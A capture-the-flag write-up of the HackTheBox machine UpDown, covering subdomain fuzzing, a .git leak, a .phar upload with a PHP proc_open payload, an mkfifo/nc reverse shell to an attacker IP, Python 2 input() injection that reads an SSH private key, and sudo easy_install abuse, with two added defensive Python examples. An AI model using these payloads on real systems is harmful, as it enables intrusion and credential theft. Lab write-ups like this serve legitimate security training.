UpDown, a medium-rated Linux machine, involved fuzzing for a subdomain, which led to a dev domain that was accessible only with a special header found in an exposed .git directory. The site had a file upload whose purpose is to check the reachability of the sites listed in that file; this led to remote code execution and a shell as www-data. In the developer user's directory there is a script that uses the input function, which is vulnerable because it is basically equivalent to the eval function and can execute commands, giving us a shell as the developer user. From there we escalate privileges to root by running easy_install as root via sudo.
NMAP
Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
The web page has functionality to check whether a site is up, and it also shows us a domain name, siteisup.htb, so let's add this to the hosts file.
With the debug mode enabled we can see the response made to the URL, which leads to Server Side Request Forgery (SSRF).
I tried using the file protocol to read a local file, file:///etc/passwd, but it was blocked.
On the domain name, we can fuzz for subdomains with wfuzz
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131
This finds a subdomain, dev, with a 403 status code.
We can try accessing it through the status check, since there is SSRF, but it shows that it's down, so there may be some filtering going on for the dev site. Fuzzing for files and directories shows /dev, but it returns a blank page. So fuzzing at /dev/, we'll find .git.
We can download .git with wget recursively using --recursive:
wget --recursive http://10.10.11.177/dev/.git/
After downloading the files, navigate to the directory which has .git and run git checkout . to recover the files.
Checking changelog.txt, it talks about removing the upload option.
The .htaccess file shows us a header; if it's not in the request, the request will be denied.
I used a Burp extension called Add Custom Header so that on every request the special header gets added.
Looking at the checker.php file, it checks for file extensions, which may lead to uploading PHP files to get code execution. It's checking for all extensions except for .phar, but even if we upload one, the script is going to read the contents of the file, make a request to each site listed in it to see if there's a 200 status code, and delete the file after making those requests.
To get code execution, we can make the site request a host which isn't reachable, so it is going to keep trying to reach that host for some time and our uploaded file won't get deleted in the meantime.
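As an added example that is not part of the original writeup or of the box's checker.php, here is a Python model of how the two weaknesses above would be closed: the status check that accepts any URL scheme (the SSRF), and the extension blocklist combined with the delete-after-check behaviour. It uses an extension allowlist instead of a blocklist, an http(s)-only URL check, a bounded request timeout with the upload removed in a finally block, and storage outside the web root. All names, the sample lists and the fake fetcher are assumptions constructed for the example.

```python
"""Hardened model of the "is my site up?" checker described above.

Added example, not the box's checker.php: the names, the sample lists and
the fake fetcher are constructed. It keeps the writeup's workflow (upload a
list of URLs, request each, delete the file) but closes the gaps the
writeup exploits: a blocklist that forgets .phar, a URL check that accepts
any scheme, and an upload that stays on disk while a target never answers.
"""
import os
import re
import tempfile
from urllib.parse import urlsplit

# Constructed blocklist in the style of a PHP upload filter; .phar is left
# out on purpose to mirror the gap found in checker.php.
BLOCKLIST = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phps"}
# The feature only ever needs a plain text list, so allow exactly that.
ALLOWLIST = {"txt"}
ALLOWED_SCHEMES = {"http", "https"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(%s)" % "|".join(sorted(ALLOWLIST)))


def extension_of(filename):
    """Last extension of the file name, lower-cased ('' when there is none)."""
    name = os.path.basename(filename)
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def blocklist_allows(filename):
    """The weak check: anything not on the list gets through."""
    return extension_of(filename) not in BLOCKLIST


def allowlist_allows(filename):
    """The strong check: one safe base name, one listed extension and no
    second dot, so 'x.phar.txt' is rejected as well."""
    return SAFE_NAME.fullmatch(os.path.basename(filename)) is not None


def url_is_checkable(url):
    """Only http(s) URLs with a host may be requested; file:// and the like
    are treated as bad input, not as targets."""
    parts = urlsplit(url.strip())
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


def check_sites(upload_path, fetch, timeout=3.0):
    """Read one URL per line and ask fetch(url, timeout) for its status code.

    Every request is bounded by the timeout and the upload is removed in a
    finally block, so a target that never answers cannot keep the file alive.
    """
    results = {}
    try:
        with open(upload_path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                url = line.strip()
                if not url:
                    continue
                if not url_is_checkable(url):
                    results[url] = "rejected"
                    continue
                try:
                    results[url] = "up" if fetch(url, timeout) == 200 else "down"
                except (TimeoutError, OSError):
                    results[url] = "down"
    finally:
        try:
            os.unlink(upload_path)
        except FileNotFoundError:
            pass
    return results


def demo():
    """Run the checker on a constructed upload against a fake fetcher.

    The file is created with mkstemp in the temp directory rather than under
    the web root, so even a leftover could not be served by Apache.
    Returns the per-URL results and whether the upload still exists.
    """
    def fake_fetch(url, timeout):
        # Constructed behaviour: one host never answers, everything else is 200.
        if "unreachable.example" in url:
            raise TimeoutError("no answer within %.1fs" % timeout)
        return 200

    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write("http://siteisup.htb\n"
                 "file:///etc/passwd\n"
                 "http://unreachable.example/\n"
                 "\n"
                 "ftp://mirror.example/\n")
    results = check_sites(path, fake_fetch, timeout=1.0)
    return results, os.path.exists(path)


if __name__ == "__main__":
    for url, state in demo()[0].items():
        print("%-30s %s" % (url, state))
```

The allowlist regex is the important change: a blocklist has to enumerate every extension the web server might execute, and the writeup shows what happens when one entry is missing, whereas an allowlist only has to name the single type the feature needs.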
Foothold
From phpinfo() we can see that most of the functions that could allow command execution are disabled; to find out which functions can still be used to get command execution we can use this script (dfunc-bypasser, see references).
We can abuse proc_open to get command execution:
<?php
// Spawn bash with stdin and stdout as pipes; stderr goes to a file.
$descriptorspec = array(
    0 => array("pipe", "r"),                          // stdin: the child reads from it
    1 => array("pipe", "w"),                          // stdout: the child writes to it
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr: appended to a file
);
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes[0] is a writeable handle connected to the child's stdin,
    // $pipes[1] a readable handle connected to its stdout; any error
    // output is appended to /tmp/error-output.txt.
    fwrite($pipes[0], "id\n");   // the command bash should run
    fclose($pipes[0]);           // EOF on stdin makes bash exit afterwards
    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // Close every pipe before calling proc_close to avoid a deadlock.
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>
On uploading the file, we'll get the output of the id command.
Using nc and mkfifo we can get a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f
Privilege Escalation (developer)
In developer's directory we can find the siteisup binary along with its source code; it runs as developer because of the SUID bit.
We can exploit this by importing the os module and executing the id command:
__import__('os').system('id')
From here we can read the SSH key and log in as the developer user:
__import__('os').system('cat /home/developer/.ssh/id_rsa')
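The input() hazard above, as an added example that is not the box's siteisup script: an ast-based audit that flags input() calls in scripts run under Python 2 (where input() is eval(raw_input()), which is why a typed expression is executed), together with a replacement that reads the URL as plain data. The sample source, the python2 shebang heuristic and the function names are constructed assumptions.

```python
"""Audit for the Python 2 input() hazard described above.

Added example, not the box's siteisup script: SAMPLE_SOURCE is a constructed
stand-in for a checker that reads a URL with input(). Under Python 2,
input() is eval(raw_input()), so whatever the user types is evaluated as
Python; the audit below flags such calls with the ast module, and read_url()
shows how the same value is read as plain data instead.
"""
import ast
from urllib.parse import urlsplit

# Constructed sample. It uses print() so that Python 3's ast can parse it.
SAMPLE_SOURCE = '''#!/usr/bin/python
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
    print("Website is up")
'''


def looks_like_python2(source):
    """Heuristic (an assumption of this example): the shebang names python2,
    or a bare 'python' interpreter. Python 3 shebangs and scripts without a
    shebang are not flagged."""
    first = source.splitlines()[0] if source else ""
    if not first.startswith("#!"):
        return False
    words = first[2:].split()
    interp = words[-1] if words else ""
    return interp.endswith("python") or "python2" in interp


def find_input_calls(source):
    """Return (line number, prompt) for every call to the builtin input()."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == "input"):
            prompt = ""
            if (node.args and isinstance(node.args[0], ast.Constant)
                    and isinstance(node.args[0].value, str)):
                prompt = node.args[0].value
            hits.append((node.lineno, prompt))
    return hits


def audit(source):
    """One finding per dangerous call; an empty list means nothing to report."""
    if not looks_like_python2(source):
        return []
    return ["line %d: input(%r) evaluates the typed text as Python under "
            "Python 2; read it with raw_input() and validate it as a string"
            % (line, prompt) for line, prompt in find_input_calls(source)]


def read_url(raw):
    """Safe replacement for the flagged line: the text is data, never code.
    Only an http(s) URL with a host is accepted; anything else raises."""
    parts = urlsplit(raw.strip())
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("not an http(s) URL: %r" % raw)
    return parts.geturl()


if __name__ == "__main__":
    for finding in audit(SAMPLE_SOURCE):
        print(finding)
```

Running the script prints one finding for line 3 of the sample. The same audit is worth running over any SUID or sudo-invoked Python 2 helper, since those are exactly the scripts where an evaluated input() turns a prompt into a shell.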
Privilege Escalation (root)
Running sudo -l will show that we can run /usr/local/bin/easy_install as the root user.
We can abuse this by checking GTFOBins for the easy_install entry.
References
- https://burpsuite.guide/extensions/add-custom-header/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst
- https://github.com/teambi0s/dfunc-bypasser
- https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html
- https://gtfobins.github.io/gtfobins/easy_install/